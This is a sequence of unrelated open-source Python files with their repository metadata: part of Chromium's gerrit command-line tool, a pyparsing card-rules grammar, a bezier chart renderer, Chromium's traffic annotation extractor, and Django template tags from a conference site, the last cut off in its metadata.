    COMMAND = 'message'

    @staticmethod
    def init_subparser(parser):
        """Add arguments to this action's subparser."""
        # Base class adds the CL list argument; we add the message on top.
        _ActionSimpleParallelCLs.init_subparser(parser)
        parser.add_argument('message',
                            help='The message to post')

    @staticmethod
    def _process_one(helper, cl, opts):
        """Use |helper| to process the single |cl|."""
        helper.SetReview(cl, msg=opts.message, dryrun=opts.dryrun)
class ActionTopic(_ActionSimpleParallelCLs):
    """Set a topic for one or more CLs"""
    COMMAND = 'topic'

    @staticmethod
    def init_subparser(parser):
        """Add arguments to this action's subparser."""
        # Base class adds the CL list argument; we add the topic on top.
        _ActionSimpleParallelCLs.init_subparser(parser)
        parser.add_argument('topic',
                            help='The topic to set')

    @staticmethod
    def _process_one(helper, cl, opts):
        """Use |helper| to process the single |cl|."""
        helper.SetTopic(cl, opts.topic, dryrun=opts.dryrun)
class ActionPrivate(_ActionSimpleParallelCLs):
    """Mark CLs private"""
    COMMAND = 'private'

    @staticmethod
    def _process_one(helper, cl, opts):
        """Use |helper| to process the single |cl|."""
        # True => private; ActionPublic is the symmetric False case.
        helper.SetPrivate(cl, True, dryrun=opts.dryrun)
class ActionPublic(_ActionSimpleParallelCLs):
    """Mark CLs public"""
    COMMAND = 'public'

    @staticmethod
    def _process_one(helper, cl, opts):
        """Use |helper| to process the single |cl|."""
        # False => public; ActionPrivate is the symmetric True case.
        helper.SetPrivate(cl, False, dryrun=opts.dryrun)
class ActionSethashtags(UserAction):
    """Add/remove hashtags on a CL (prepend with '~' to remove)"""
    COMMAND = 'hashtags'

    @staticmethod
    def init_subparser(parser):
        """Add arguments to this action's subparser."""
        parser.add_argument('cl', metavar='CL',
                            help='The CL to update')
        parser.add_argument('hashtags', nargs='+',
                            help='The hashtags to add/remove')

    @staticmethod
    def __call__(opts):
        """Implement the action."""
        # Partition the requested tags: a '~' prefix marks a removal.
        to_add, to_remove = [], []
        for tag in opts.hashtags:
            if tag.startswith('~'):
                to_remove.append(tag[1:])
            else:
                to_add.append(tag)
        helper, cl = GetGerrit(opts, opts.cl)
        helper.SetHashtags(cl, to_add, to_remove, dryrun=opts.dryrun)
class ActionDeletedraft(_ActionSimpleParallelCLs):
    """Delete draft CLs"""
    COMMAND = 'deletedraft'

    @staticmethod
    def _process_one(helper, cl, opts):
        """Use |helper| to process the single |cl|."""
        helper.DeleteDraft(cl, dryrun=opts.dryrun)
class ActionReviewed(_ActionSimpleParallelCLs):
    """Mark CLs as reviewed"""
    COMMAND = 'reviewed'

    @staticmethod
    def _process_one(helper, cl, opts):
        """Use |helper| to process the single |cl|."""
        helper.ReviewedChange(cl, dryrun=opts.dryrun)
class ActionUnreviewed(_ActionSimpleParallelCLs):
    """Mark CLs as unreviewed"""
    COMMAND = 'unreviewed'

    @staticmethod
    def _process_one(helper, cl, opts):
        """Use |helper| to process the single |cl|."""
        helper.UnreviewedChange(cl, dryrun=opts.dryrun)
class ActionIgnore(_ActionSimpleParallelCLs):
    """Ignore CLs (suppress notifications/dashboard/etc...)"""
    COMMAND = 'ignore'

    @staticmethod
    def _process_one(helper, cl, opts):
        """Use |helper| to process the single |cl|."""
        helper.IgnoreChange(cl, dryrun=opts.dryrun)
class ActionUnignore(_ActionSimpleParallelCLs):
    """Unignore CLs (enable notifications/dashboard/etc...)"""
    COMMAND = 'unignore'

    @staticmethod
    def _process_one(helper, cl, opts):
        """Use |helper| to process the single |cl|."""
        helper.UnignoreChange(cl, dryrun=opts.dryrun)
class ActionAccount(UserAction):
    """Get the current user account information"""
    COMMAND = 'account'

    @staticmethod
    def __call__(opts):
        """Implement the action."""
        # No CL argument: query the selected Gerrit instance for the
        # authenticated caller's own account record.
        helper, _ = GetGerrit(opts)
        acct = helper.GetAccount()
        if opts.json:
            # Machine-readable output for scripting (--json).
            json.dump(acct, sys.stdout)
        else:
            print('account_id:%i %s <%s>' %
                  (acct['_account_id'], acct['name'], acct['email']))
@memoize.Memoize
def _GetActions():
    """Get all the possible actions we support.

    Returns:
      An ordered dictionary mapping the user subcommand (e.g. "foo") to the
      class that implements that command (e.g. ActionFoo).
    """
    name_re = re.compile(r'^[a-z][a-z-]*[a-z]$')
    found = {}
    for obj in globals().values():
        is_action = (inspect.isclass(obj) and issubclass(obj, UserAction)
                     and getattr(obj, 'COMMAND', None))
        if not is_action:
            continue
        # Sanity check names for devs adding new commands. Should be quick.
        cmd = obj.COMMAND
        assert name_re.match(cmd), '"%s" must match [a-z-]+' % (cmd,)
        assert cmd not in found, 'multiple "%s" commands found' % (cmd,)
        found[cmd] = obj
    return collections.OrderedDict(sorted(found.items()))
def _GetActionUsages():
    """Formats a one-line usage and doc message for each action."""
    # One (command, usage, first-doc-line) row per registered action.
    rows = [(cmd, getattr(cls, 'usage', ''), cls.__doc__.splitlines()[0])
            for cmd, cls in _GetActions().items()]
    # Pad command & usage columns to the widest entry so the ':' docs align.
    cmd_width = max(len(row[0]) for row in rows)
    usage_width = max(len(row[1]) for row in rows)
    return '\n'.join(
        ' %-*s %-*s : %s' % (cmd_width, cmd, usage_width, usage, doc)
        for cmd, usage, doc in rows
    )
def GetParser():
    """Returns the parser to use for this module."""
    # NOTE: this text is user-visible --help output.
    description = """\
There is no support for doing line-by-line code review via the command line.
This helps you manage various bits and CL status.
For general Gerrit documentation, see:
  https://gerrit-review.googlesource.com/Documentation/
The Searching Changes page covers the search query syntax:
  https://gerrit-review.googlesource.com/Documentation/user-search.html
Example:
  $ gerrit todo              # List all the CLs that await your review.
  $ gerrit mine              # List all of your open CLs.
  $ gerrit inspect 28123     # Inspect CL 28123 on the public gerrit.
  $ gerrit inspect *28123    # Inspect CL 28123 on the internal gerrit.
  $ gerrit label-v 28123 1   # Mark CL 28123 as verified (+1).
  $ gerrit reviewers 28123 foo@chromium.org    # Add foo@ as a reviewer on CL \
28123.
  $ gerrit reviewers 28123 ~foo@chromium.org   # Remove foo@ as a reviewer on \
CL 28123.
Scripting:
  $ gerrit label-cq `gerrit --raw mine` 1      # Mark *ALL* of your public CLs \
with Commit-Queue=1.
  $ gerrit label-cq `gerrit --raw -i mine` 1   # Mark *ALL* of your internal \
CLs with Commit-Queue=1.
  $ gerrit --json search 'assignee:self'       # Dump all pending CLs in JSON.
Actions:
"""
    description += _GetActionUsages()
    actions = _GetActions()
    site_params = config_lib.GetSiteParams()
    parser = commandline.ArgumentParser(description=description)
    # -i flips the default external instance to the internal one.
    parser.add_argument('-i', '--internal', dest='gob', action='store_const',
                        default=site_params.EXTERNAL_GOB_INSTANCE,
                        const=site_params.INTERNAL_GOB_INSTANCE,
                        help='Query internal Chromium Gerrit instance')
    parser.add_argument('-g', '--gob',
                        default=site_params.EXTERNAL_GOB_INSTANCE,
                        help=('Gerrit (on borg) instance to query (default: %s)' %
                              (site_params.EXTERNAL_GOB_INSTANCE)))
    parser.add_argument('--raw', default=False, action='store_true',
                        help='Return raw results (suitable for scripting)')
    parser.add_argument('--json', default=False, action='store_true',
                        help='Return results in JSON (suitable for scripting)')
    parser.add_argument('-n', '--dry-run', default=False, action='store_true',
                        dest='dryrun',
                        help='Show what would be done, but do not make changes')
    parser.add_argument('-v', '--verbose', default=False, action='store_true',
                        help='Be more verbose in output')
    # Subparsers are required by default under Python 2.  Python 3 changed to
    # not required, but didn't include a required option until 3.7.  Setting
    # the required member works in all versions (and setting dest name).
    subparsers = parser.add_subparsers(dest='action')
    subparsers.required = True
    for cmd, cls in actions.items():
        # Format the full docstring by removing the file level indentation.
        description = re.sub(r'^ ', '', cls.__doc__, flags=re.M)
        subparser = subparsers.add_parser(cmd, description=description)
        # Every subcommand also accepts a local -n/--dry-run.
        subparser.add_argument('-n', '--dry-run', dest='dryrun',
                               default=False, action='store_true',
                               help='Show what would be done only')
        cls.init_subparser(subparser)
    return parser
def main(argv):
    """Entry point: parse arguments and dispatch to the selected action."""
    parser = GetParser()
    opts = parser.parse_args(argv)
    # A cache of gerrit helpers we'll load on demand.
    opts.gerrit = {}
    opts.Freeze()
    # pylint: disable=global-statement
    global COLOR
    COLOR = terminal.Color(enabled=opts.color)
    # Now look up the requested user action and run it.
    actions = _GetActions()
    obj = actions[opts.action]()
    try:
        obj(opts)
    except (cros_build_lib.RunCommandError, gerrit.GerritException,
            gob_util.GOBError) as e:
        # Known operational failures: die with the message, no traceback.
        cros_build_lib.Die(e)
|
{
"content_hash": "8da5b054f4f55ff2672676485fa342bb",
"timestamp": "",
"source": "github",
"line_count": 923,
"max_line_length": 80,
"avg_line_length": 30.63163596966414,
"alnum_prop": 0.6365083295016447,
"repo_name": "endlessm/chromium-browser",
"id": "5b4d741daad36373d47eab8c8b7ec5fc197efdf4",
"size": "28467",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "third_party/chromite/scripts/gerrit.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
from pyparsing import *
from decl import *
from ..keywords.deff import keywords
from ...constants.articles.deff import EACH
from ...constants.connectors.deff import IF
from ...constants.modifiers.deff import ABLE
from ...constants.prepositions.deff import UNTIL, OF
from ...constants.verbs.deff import HAVE, GET, BE, GAIN, CONTROL, CANT, MUST, ATTACK, BLOCK
from ...constants.timing.deff import TURN, UPKEEP, DRAWSTEP, PRECOMBAT, COMBAT, POSCOMBAT, END
from ...entities.subjects.deff import subjects, objects
from ...functions.deff import delimitedListAnd
from ...ptl.deff import ptmod
# Grammar for "continuous" effects.  Each name filled in with ``<<`` below is
# a pyparsing Forward placeholder (declared elsewhere and pulled in via the
# star-imports above), so definition order here only wires up the grammar.
#thisturn << THIS + TURN
until << UNTIL + END + OF + TURN
# add as-long-as clause
# remember it can go before or after the effect
havekeywords << HAVE + delimitedListAnd(keywords)
getptmod << GET + ptmod
gaincontrol << GAIN + CONTROL + OF + objects
#attack << ATTACK
#block << BLOCK
# one of the cases where "or" means "both" and not "option", beware!
#cantattackorblock << CANT + delimitedListOr(attack|block)
# add "can't be blocked [by X]"
#mustattack << MUST + ATTACK + EACH + TURN
#mustbeblocked << MUST + BE + BLOCK
# A single grantable property; alternatives are tried in this order.
property_ << (
    havekeywords
    | getptmod
    | gaincontrol
    #| cantattackorblock
    #| mustattack
)
properties << delimitedListAnd(property_)
# A continuous effect: subject(s) gain properties, optionally time-limited.
continuous << subjects + properties + Optional(until)#+ ZeroOrMore(until|thisturn|ifable)
|
{
"content_hash": "48933de35ddac19d4c2adf5f1f051910",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 94,
"avg_line_length": 29.26086956521739,
"alnum_prop": 0.736255572065379,
"repo_name": "jrgdiz/cardwalker",
"id": "8826a65686d46cf51d0a8c6ea371c88d1cbf07a1",
"size": "1346",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "grammar/rules/continuous/deff.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "49118"
},
{
"name": "Shell",
"bytes": "2228"
}
],
"symlink_target": ""
}
|
from gruffy import base
from pgmagick import Coordinate, CoordinateList, DrawableBezier, \
DrawableFillColor, DrawableFillOpacity, DrawableList, \
DrawableStrokeColor, DrawableStrokeWidth
class Bezier(base.Base):
    """Bezier Graph Object"""

    def draw(self):
        """Render the base graph, then overlay one bezier curve per series."""
        base.Base.draw(self)
        if not self.has_gdata:
            return
        self._draw_bezier()

    def _draw_bezier(self):
        """Build and paint the bezier paths for every normalized data row."""
        # Horizontal distance between consecutive data points.
        self.x_increment = self.graph_width / float(self.column_count - 1)
        drawables = DrawableList()
        for row in self.norm_data:
            points = CoordinateList()
            drawables.append(DrawableFillColor(row['color']))
            for idx, value in enumerate(row['values']):
                # Use incremented x and scaled y.
                px = self.graph_left + (self.x_increment * idx)
                py = self.graph_top + (self.graph_height -
                                       value * self.graph_height)
                if idx == 0:
                    # Anchor the path at the bottom-left of the plot area.
                    points.append(
                        Coordinate(self.graph_left, self.graph_bottom - 1))
                points.append(Coordinate(px, py))
                self.draw_label(px, idx)
            drawables.append(DrawableFillOpacity(0.0))
            drawables.append(DrawableStrokeColor(row['color']))
            stroke = self.clip_value_if_greater_than(
                self.columns / (len(self.norm_data[0]['values']) * 4), 5.0)
            drawables.append(DrawableStrokeWidth(stroke))
            drawables.append(DrawableBezier(points))
        self.base_image.draw(drawables)
|
{
"content_hash": "b400ed464bc9101071463c3329d178a6",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 135,
"avg_line_length": 42.108108108108105,
"alnum_prop": 0.5860077021822849,
"repo_name": "hhatto/gruffy",
"id": "31c791c0bc919bc8525cf428ae67bdecd864e5b6",
"size": "1558",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "gruffy/bezier.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "95127"
}
],
"symlink_target": ""
}
|
#!/usr/bin/env python
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Extracts network traffic annotation definitions from C++ source code.
"""
from __future__ import print_function
import argparse
import os
import re
import sys
import traceback
from annotation_tools import NetworkTrafficAnnotationTools
from annotation_tokenizer import Tokenizer, CppParsingError
# Exit code for parsing errors. Other runtime errors return 1.
EX_PARSE_ERROR = 2
ANNOTATION_TYPES = {
'DefineNetworkTrafficAnnotation': 'Definition',
'DefinePartialNetworkTrafficAnnotation': 'Partial',
'CompleteNetworkTrafficAnnotation': 'Completing',
'BranchedCompleteNetworkTrafficAnnotation': 'BranchedCompleting',
'CreateMutableNetworkTrafficAnnotationTag': 'Mutable',
}
# Regex that matches an annotation definition.
CALL_DETECTION_REGEX = re.compile(r'''
\b
# Look for one of the tracked function names.
# Capture group 1.
(
''' + ('|'.join(ANNOTATION_TYPES.keys())) + r'''
)
# Followed by a left-paren.
\s*
\(
''', re.VERBOSE | re.DOTALL)
# Regex that matches an annotation that should only be used in test files.
TEST_ANNOTATION_REGEX = re.compile(
r'\b(PARTIAL_)?TRAFFIC_ANNOTATION_FOR_TESTS\b')
# Regex that matches a placeholder annotation for a few whitelisted files.
MISSING_ANNOTATION_REGEX = re.compile(r'\bMISSING_TRAFFIC_ANNOTATION\b')
class Annotation:
    """A network annotation definition in C++ code."""

    def __init__(self, file_path, line_number, type_name='', unique_id='',
                 extra_id='', text=''):
        """Constructs an Annotation object with the given field values.

        Args:
          file_path: Path to the file that contains this annotation.
          line_number: 1-based line where the annotation starts.
          type_name: One of the ANNOTATION_TYPES values.
          unique_id: The annotation's unique id string.
          extra_id: Secondary id (Partial/BranchedCompleting only).
          text: The annotation's proto text.
        """
        self.file_path = file_path
        self.line_number = line_number
        self.type_name = type_name
        self.unique_id = unique_id
        self.extra_id = extra_id
        self.text = text

    def parse_definition(self, re_match):
        """Parses the annotation and populates object fields.

        Args:
          re_match: A MatchObject obtained from CALL_DETECTION_REGEX.
        """
        self.type_name = ANNOTATION_TYPES[re_match.group(1)]
        # Everything after the opening paren holds the call's arguments;
        # parsing it fills |unique_id|, |text| and (possibly) |extra_id|.
        self._parse_body(re_match.string[re_match.end():])

    def extractor_output_string(self):
        """Returns a string formatted for output."""
        fields = [
            "==== NEW ANNOTATION ====",
            self.file_path,
            self.line_number,
            self.type_name,
            self.unique_id,
            self.extra_id,
            self.text,
            "==== ANNOTATION ENDS ====",
        ]
        return "\n".join(str(field) for field in fields)

    def _parse_body(self, body):
        """Tokenizes and parses the arguments given to the definition function."""
        # CreateMutableNetworkTrafficAnnotationTag() arguments are irrelevant.
        if self.type_name == 'Mutable':
            return
        tokenizer = Tokenizer(body, self.file_path, self.line_number)
        # First argument is always the unique id.
        self.unique_id = tokenizer.advance('string_literal')
        tokenizer.advance('comma')
        # extra_id (Partial/BranchedCompleting only).
        if self.type_name in ('Partial', 'BranchedCompleting'):
            self.extra_id = tokenizer.advance('string_literal')
            tokenizer.advance('comma')
        # partial_annotation argument (Completing/BranchedCompleting only).
        if self.type_name in ('Completing', 'BranchedCompleting'):
            # Skip it: it can be a variable_name or a FunctionName(), so also
            # skip the parentheses if they're there.
            tokenizer.advance('symbol')
            if tokenizer.maybe_advance('left_paren'):
                tokenizer.advance('right_paren')
            tokenizer.advance('comma')
        # Final argument: the proto text.
        self.text = tokenizer.advance('string_literal')
        # The function call should end here without any more arguments.
        assert tokenizer.advance('right_paren')
def get_line_number_at(string, pos):
    """Find the line number for the char at position |pos|. 1-indexed.

    Args:
      string: The text to scan.
      pos: Character offset into |string|.

    Returns:
      The 1-based line number that contains |string[pos]|.
    """
    # str.count() runs in C and avoids compiling a throwaway regex just to
    # count newlines.  Still O(pos), but we only run this once per annotation
    # definition, so the effect on total runtime is negligible.
    return 1 + string.count('\n', 0, pos)
def is_inside_comment(string, pos):
    """Checks if the position |pos| within string seems to be inside a comment.

    This is a bit naive. Only checks for single-line comments (// ...), not block
    comments (/* ... */).

    Args:
      string: string to scan.
      pos: position within the string.

    Returns:
      True if |string[pos]| looks like it's inside a C++ comment.
    """
    # Scan the current line directly instead of regex-matching a reversed copy
    # of the whole prefix: clearer, and avoids building an O(pos) temporary.
    # Using pos+1 in rfind() keeps the old edge behavior: if string[pos] is
    # itself a newline, the slice is empty and we report False.
    line_start = string.rfind('\n', 0, pos + 1) + 1
    return '//' in string[line_start:pos + 1]
# TODO(crbug/966883): Add multi-line comment support.
def extract_annotations(file_path):
    """Extracts and returns annotations from the file at |file_path|."""
    with open(file_path) as f:
        contents = f.read()
    found = []
    # Annotation-defining calls, e.g. DefineNetworkTrafficAnnotation(...).
    for match in CALL_DETECTION_REGEX.finditer(contents):
        if is_inside_comment(match.string, match.start()):
            continue
        annotation = Annotation(
            file_path, get_line_number_at(contents, match.start()))
        annotation.parse_definition(match)
        found.append(annotation)
    # Test-only annotations, e.g. TRAFFIC_ANNOTATION_FOR_TESTS.
    for match in TEST_ANNOTATION_REGEX.finditer(contents):
        if is_inside_comment(match.string, match.start()):
            continue
        if match.group(1):
            # PARTIAL_ prefix was present.
            type_name, unique_id, extra_id = 'Partial', 'test_partial', 'test'
        else:
            type_name, unique_id, extra_id = 'Definition', 'test', ''
        found.append(Annotation(
            file_path, get_line_number_at(contents, match.start()),
            type_name=type_name, unique_id=unique_id, extra_id=extra_id,
            text='Traffic annotation for unit, browser and other tests'))
    # Placeholder MISSING_TRAFFIC_ANNOTATION markers.
    for match in MISSING_ANNOTATION_REGEX.finditer(contents):
        if is_inside_comment(match.string, match.start()):
            continue
        found.append(Annotation(
            file_path, get_line_number_at(contents, match.start()),
            type_name='Definition', unique_id='missing',
            text='Function called without traffic annotation.'))
    return found
def main():
    """Command-line entry point: parse args, extract annotations, print them.

    Returns:
      0 on success, EX_PARSE_ERROR when a file fails to parse.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--options-file',
        help='optional file to read options from')
    args, argv = parser.parse_known_args()
    # Support a response file: remaining options are read from it instead.
    if args.options_file:
        argv = open(args.options_file).read().split()
    parser.add_argument(
        '--build-path',
        help='Specifies a compiled build directory, e.g. out/Debug.')
    parser.add_argument(
        '--generate-compdb', action='store_true',
        help='Generate a new compile_commands.json before running')
    parser.add_argument(
        '--no-filter', action='store_true',
        help='Do not filter files based on compdb entries')
    parser.add_argument(
        'file_paths', nargs='+', help='List of files to process.')
    args = parser.parse_args(argv)
    tools = NetworkTrafficAnnotationTools(args.build_path)
    compdb_files = tools.GetCompDBFiles(args.generate_compdb)
    annotation_definitions = []
    # Parse all the files.
    # TODO(crbug/966883): Do this in parallel.
    for file_path in args.file_paths:
        # Skip files absent from the compilation database (unless --no-filter).
        if not args.no_filter and os.path.abspath(file_path) not in compdb_files:
            continue
        try:
            annotation_definitions.extend(extract_annotations(file_path))
        except CppParsingError:
            traceback.print_exc()
            return EX_PARSE_ERROR
    # Print output.
    for annotation in annotation_definitions:
        print(annotation.extractor_output_string())
    # If all files were successfully checked for annotations but none of them had
    # any, print something so that the traffic_annotation_auditor knows there was
    # no error so that the files get checked for deleted annotations.
    if not annotation_definitions:
        print('No annotations in these files.')
    return 0
# Script entry point.
if '__main__' == __name__:
    sys.exit(main())
|
{
"content_hash": "437eaccc5cd7ec2ff3868816a1c3bbd2",
"timestamp": "",
"source": "github",
"line_count": 261,
"max_line_length": 80,
"avg_line_length": 32.70498084291188,
"alnum_prop": 0.6836925960637301,
"repo_name": "endlessm/chromium-browser",
"id": "b239ffc25dbe79b2206bdbfb8cd0fa6a218a665f",
"size": "8536",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tools/traffic_annotation/scripts/extractor.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
from assopy import models
from assopy import settings
from django import forms
from django import template
from django.conf import settings as dsettings
from django.core import paginator
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
import urllib
register = template.Library()
_field_template_standard = template.Template("""
<div class="{{ classes }}">
<label for="{{ field.auto_id }}">{{ field.label|safe }}{% if field.field.required %}<span class="required">{{ required_text }}</span>{% endif %}</label>
{{ field }}
{% if field.help_text %}<div class="help-text">{{ field.help_text|safe }}</div>{% endif %}
{{ field.errors }}
</div>
""")
_field_template_label_inline = template.Template("""
<div class="{{ classes }}">
<label for="{{ field.auto_id }}">{{ field }} {{ field.label|safe }}{% if field.field.required %}<span class="required">{{ required_text }}</span>{% endif %}</label>
{% if field.help_text %}<div class="help-text">{{ field.help_text|safe }}</div>{% endif %}
{{ field.errors }}
</div>
""")
_field_template_input_list = template.Template("""
<div class="{{ classes }}">
<label>{{ field.label|safe }}{% if field.field.required %}<span class="required">{{ required_text }}</span>{% endif %}</label>
{{ field }}
{% if field.help_text %}<div class="help-text">{{ field.help_text|safe }}</div>{% endif %}
{{ field.errors }}
</div>
""")
_field_template_no_label = template.Template("""
<div class="{{ classes }}">
{{ field }}
{% if field.help_text %}<div class="help-text">{{ field.help_text|safe }}</div>{% endif %}
{{ field.errors }}
</div>
""")
fields_template = {
None: _field_template_standard,
forms.widgets.CheckboxInput: _field_template_label_inline,
forms.widgets.RadioSelect: _field_template_input_list,
'no_label': _field_template_no_label,
}
@register.filter()
def field(field, cls=None):
    """Render a bound form field wrapped in a styled <div>.

    `cls` is an optional whitespace-separated list of extra CSS classes; a
    token of the form "tpl:KEY" selects an alternate rendering template from
    `fields_template` instead of being emitted as a class.
    """
    if not hasattr(field, 'field'):
        return 'Invalid field "%r"' % field
    tpl_key = None
    extra = []
    if cls:
        # BUG FIX: `extra` used to be pre-seeded with *all* tokens (including
        # the "tpl:..." selectors) before this loop appended the non-selector
        # tokens a second time -- every class was duplicated and the template
        # selector leaked into the rendered class attribute.
        for v in cls.split(None):
            if v.startswith('tpl:'):
                tpl_key = v[4:]
            else:
                extra.append(v)
    classes = ['field']
    if field.field.required:
        classes.append('required')
    classes.extend(extra)
    classes.append(field.field.__class__.__name__.lower())
    if field.errors:
        classes.append('error')
    widget = field.field.widget
    if isinstance(widget, (forms.HiddenInput,)):
        # Hidden inputs need no wrapper/label markup.
        return str(field)
    else:
        if not tpl_key:
            # Fall back to dispatching on the widget class.
            tpl_key = type(widget)
        try:
            tpl = fields_template[tpl_key]
        except KeyError:
            tpl = fields_template[None]
        ctx = {
            'classes': ' '.join(classes),
            'field': field,
            'required_text': _('(required)'),
        }
        return tpl.render(template.Context(ctx))
_form_errors_tpl = template.Template("""
{% load i18n %}
<div class="error-notice">
{% if form.non_field_errors %}
{% for e in form.non_field_errors %}
<div>↓ {{ e }}</div>
{% endfor %}
{% else %}
<div>↓ {% trans "Warning, check your data on the form below" %}</div>
{% endif %}
</div>
""")
@register.filter()
def form_errors(form, cls=None):
    """Render the error-notice box for a form ('' when the form is valid).

    `cls` is accepted for filter-signature compatibility but is unused.
    """
    if not form.errors:
        return ''
    # The template only reads `form`; the old code built an unused `classes`
    # list and leaked the entire locals() dict into the template context.
    return _form_errors_tpl.render(template.Context({'form': form}))
# Since Django 1.3 this filter is no longer needed; `field.value` can be used
# directly: http://code.djangoproject.com/ticket/10427
@register.filter
def field_value(field):
    """
    Returns the value for this BoundField, as rendered in widgets.
    """
    # Unbound forms (and bound FileFields with no submitted data) fall back
    # to the form/field initial value.
    use_initial = (not field.form.is_bound or
                   (isinstance(field.field, forms.FileField) and
                    field.data is None))
    if use_initial:
        val = field.form.initial.get(field.name, field.field.initial)
    else:
        val = field.data
    if callable(val):
        val = val()
    return val if val is not None else ''
@register.filter
def field_display_value(field):
    """Human-readable value: map raw choice values to their display labels."""
    val = field_value(field)
    if not hasattr(field.field, 'choices'):
        return val
    labels = dict(field.field.choices)
    if isinstance(field.field, (forms.MultipleChoiceField,)):  # forms.TypedMultipleChoiceField)):
        # Map every selected raw value to its label.
        return [labels.get(v, '') for v in val]
    return labels.get(val, '')
@register.filter
def field_widget(field, attrs):
    """Merge "k=v,k2=v2" attribute pairs into the field's widget attrs."""
    parsed = dict(
        tuple(part.strip() for part in spec.split('='))
        for spec in attrs.split(','))
    field.field.widget.attrs.update(parsed)
    return field
@register.filter
def as_range(value):
    """Turn an integer into an iterable 0..value-1 (for {% for %} loops)."""
    return range(value)
@register.inclusion_tag('assopy/render_janrain_box.html', takes_context=True)
def render_janrain_box(context, next=None, mode='embed'):
    """Render the Janrain login box (url is None when Janrain is disabled)."""
    if settings.JANRAIN:
        # Remember, in the current session, where the user wants to be
        # redirected once logged in.
        if next:
            context['request'].session['jr_next'] = next
        domain = settings.JANRAIN['domain']
        if not domain.endswith('/'):
            domain += '/'
        u = '%sopenid/embed?token_url=%s' % (domain, urllib.quote_plus(dsettings.DEFAULT_URL_PREFIX + reverse('assopy-janrain-token')))
    else:
        u = None
    return {
        'url': u,
        'mode': mode,
    }
class TNode(template.Node):
    """Base template node with helpers to treat tag arguments either as
    double-quoted string literals or as context variables."""

    def _set_var(self, v):
        # Empty/None arguments pass through untouched.
        if not v:
            return v
        # A double-quoted token is a literal; anything else is a variable.
        if v.startswith('"') and v.endswith('"'):
            return v[1:-1]
        return template.Variable(v)

    def _get_var(self, v, context):
        # Plain strings (literals) have no .resolve() and are returned as-is.
        try:
            return v.resolve(context)
        except AttributeError:
            return v
def _get_cached_order_status(request, order_id):
    """Memoize Order.complete() on the request (one lookup per request)."""
    if not hasattr(request, '_order_cache'):
        request._order_cache = {}
    cache = request._order_cache
    if order_id not in cache:
        cache[order_id] = models.Order.objects.get(pk=order_id).complete()
    return cache[order_id]
@register.tag
def order_complete(parser, token):
    """
    {% order_complete order_id as var %}

    Equivalent to `Order.objects.get(id=order_id).complete()`, but memoizes
    the result in a cache that lives only as long as the current request.
    """
    contents = token.split_contents()
    tag_name = contents[0]
    # Syntax check: the tag must end with "as <var>".
    if contents[-2] != 'as':
        raise template.TemplateSyntaxError("%r tag had invalid arguments" %tag_name)
    var_name = contents[-1]
    order_id = contents[1]
    class Node(template.Node):
        def __init__(self, order_id, var_name):
            self.order_id = template.Variable(order_id)
            self.var_name = var_name
        def render(self, context):
            # An unresolvable order id marks the order as not complete.
            try:
                order_id = self.order_id.resolve(context)
            except AttributeError:
                complete = False
            else:
                request = context.get('request')
                if request:
                    # Use the per-request memoized lookup when possible.
                    complete = _get_cached_order_status(request, order_id)
                else:
                    complete = models.Order.objects.get(id=order_id).complete()
            # Assign into the context; the tag itself renders nothing.
            context[self.var_name] = complete
            return ''
    return Node(order_id, var_name)
@register.filter()
def include_payment(order, type):
    """True when the order contains at least one item paid via `type`."""
    matching = order.orderitem_set.filter(ticket__fare__payment_type=type)
    return matching.exists()
@register.filter()
def include_fare(order, codes):
    """True when the order has an item whose fare code is in the
    comma-separated `codes` list."""
    wanted = codes.split(',')
    return order.orderitem_set.filter(ticket__fare__code__in=wanted).exists()
@register.filter
def user_coupons(user):
    """Partition the user's coupons into currently valid and invalid ones."""
    valid, invalid = [], []
    for coupon in user.coupon_set.all():
        (valid if coupon.valid(user) else invalid).append(coupon)
    return {'valid': valid, 'invalid': invalid}
@register.inclusion_tag('assopy/render_profile_last_block.html', takes_context=True)
def render_profile_last_block(context):
    """Render the closing block of the profile page with the full context."""
    return context
@register.simple_tag(takes_context=True)
def paginate(context, qs, count=20):
    """Return the requested page of `qs`, clamping out-of-range page numbers.

    The page index is read from the request's `page` GET parameter; invalid
    or out-of-range values fall back to the nearest valid page.
    """
    pages = paginator.Paginator(qs, int(count))
    try:
        ix = int(context['request'].GET.get('page', 1))
    except ValueError:
        ix = 1
    try:
        return pages.page(ix)
    except paginator.InvalidPage:
        # Was a bare `except:`, which also swallowed unrelated errors
        # (including SystemExit/KeyboardInterrupt). Only an out-of-range
        # page should trigger the clamp.
        ix = 1 if ix < 1 else pages.num_pages
        return pages.page(ix)
@register.simple_tag(takes_context=True)
def add_page_number_to_query(context, page, get=None):
    """Return the querystring with its `page` parameter set to `page`."""
    if get is None:
        params = context['request'].GET.copy()
    else:
        params = dict(get)
    params['page'] = page
    return urllib.urlencode(params)
@register.inclusion_tag('assopy/render_voucher.html', takes_context=True)
def render_voucher(context, item):
    """Render a single voucher/order item."""
    return {
        'item': item,
    }
@register.assignment_tag(takes_context=True)
def orderitem_can_be_refunded(context, item):
    """Whether `item` may be refunded for the acting user.

    When an admin is impersonating someone (a "doppelganger" session entry),
    the check runs against the impersonated account instead.
    """
    req = context['request']
    if 'doppelganger' in req.session:
        from django.contrib.auth.models import User
        user = User.objects.get(id=req.session['doppelganger'][0])
    else:
        user = context['user']
    return settings.ORDERITEM_CAN_BE_REFUNDED(user, item)
|
{
"content_hash": "180da1d7450ea9e54ce14e4e7a69b5ca",
"timestamp": "",
"source": "github",
"line_count": 298,
"max_line_length": 172,
"avg_line_length": 31.14765100671141,
"alnum_prop": 0.5985778926955397,
"repo_name": "barrachri/epcon",
"id": "6100ced99685f41e8cdcd252829c945d6c36cc10",
"size": "9312",
"binary": false,
"copies": "1",
